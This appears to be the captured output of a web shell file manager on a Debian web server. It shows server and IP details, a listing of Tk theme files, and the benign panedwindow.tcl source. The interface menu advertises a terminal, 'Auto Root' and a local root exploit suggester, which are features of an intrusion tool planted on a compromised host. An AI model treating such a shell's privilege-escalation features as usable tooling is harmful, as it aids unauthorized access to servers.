Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.41
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
tcltk /
tk8.6 /
ttk /
Delete
Unzip
Name
Size
Permission
Date
Action
altTheme.tcl
3.26
KB
-rw-r--r--
2016-07-28 05:22
aquaTheme.tcl
1.95
KB
-rw-r--r--
2016-07-28 05:22
button.tcl
2.91
KB
-rw-r--r--
2016-07-28 05:22
clamTheme.tcl
4.16
KB
-rw-r--r--
2016-07-28 05:22
classicTheme.tcl
3.44
KB
-rw-r--r--
2016-07-28 05:22
combobox.tcl
12.1
KB
-rw-r--r--
2016-07-28 05:22
cursors.tcl
3.91
KB
-rw-r--r--
2016-07-28 05:22
defaults.tcl
3.6
KB
-rw-r--r--
2016-07-28 05:22
entry.tcl
16.01
KB
-rw-r--r--
2016-07-28 05:22
fonts.tcl
5.45
KB
-rw-r--r--
2016-07-28 05:22
menubutton.tcl
4.8
KB
-rw-r--r--
2016-07-28 05:22
notebook.tcl
5.49
KB
-rw-r--r--
2016-07-28 05:22
panedwindow.tcl
1.88
KB
-rw-r--r--
2016-07-28 05:22
progress.tcl
1.06
KB
-rw-r--r--
2016-07-28 05:22
scale.tcl
2.63
KB
-rw-r--r--
2016-07-28 05:22
scrollbar.tcl
3.02
KB
-rw-r--r--
2016-07-28 05:22
sizegrip.tcl
2.34
KB
-rw-r--r--
2016-07-28 05:22
spinbox.tcl
4.16
KB
-rw-r--r--
2016-07-28 05:22
treeview.tcl
8.65
KB
-rw-r--r--
2016-07-28 05:22
ttk.tcl
4.44
KB
-rw-r--r--
2016-07-28 05:22
utils.tcl
8.36
KB
-rw-r--r--
2016-07-28 05:22
vistaTheme.tcl
9.13
KB
-rw-r--r--
2016-07-28 05:22
winTheme.tcl
2.58
KB
-rw-r--r--
2016-07-28 05:22
xpTheme.tcl
1.88
KB
-rw-r--r--
2016-07-28 05:22
Save
Rename
# # Bindings for ttk::panedwindow widget. # namespace eval ttk::panedwindow { variable State array set State { pressed 0 pressX - pressY - sash - sashPos - } } ## Bindings: # bind TPanedwindow <ButtonPress-1> { ttk::panedwindow::Press %W %x %y } bind TPanedwindow <B1-Motion> { ttk::panedwindow::Drag %W %x %y } bind TPanedwindow <ButtonRelease-1> { ttk::panedwindow::Release %W %x %y } bind TPanedwindow <Motion> { ttk::panedwindow::SetCursor %W %x %y } bind TPanedwindow <Enter> { ttk::panedwindow::SetCursor %W %x %y } bind TPanedwindow <Leave> { ttk::panedwindow::ResetCursor %W } # See <<NOTE-PW-LEAVE-NOTIFYINFERIOR>> bind TPanedwindow <<EnteredChild>> { ttk::panedwindow::ResetCursor %W } ## Sash movement: # proc ttk::panedwindow::Press {w x y} { variable State set sash [$w identify $x $y] if {$sash eq ""} { set State(pressed) 0 return } set State(pressed) 1 set State(pressX) $x set State(pressY) $y set State(sash) $sash set State(sashPos) [$w sashpos $sash] } proc ttk::panedwindow::Drag {w x y} { variable State if {!$State(pressed)} { return } switch -- [$w cget -orient] { horizontal { set delta [expr {$x - $State(pressX)}] } vertical { set delta [expr {$y - $State(pressY)}] } } $w sashpos $State(sash) [expr {$State(sashPos) + $delta}] } proc ttk::panedwindow::Release {w x y} { variable State set State(pressed) 0 SetCursor $w $x $y } ## Cursor management: # proc ttk::panedwindow::ResetCursor {w} { variable State if {!$State(pressed)} { ttk::setCursor $w {} } } proc ttk::panedwindow::SetCursor {w x y} { set cursor "" if {[llength [$w identify $x $y]]} { # Assume we're over a sash. switch -- [$w cget -orient] { horizontal { set cursor hresize } vertical { set cursor vresize } } } ttk::setCursor $w $cursor } #*EOF*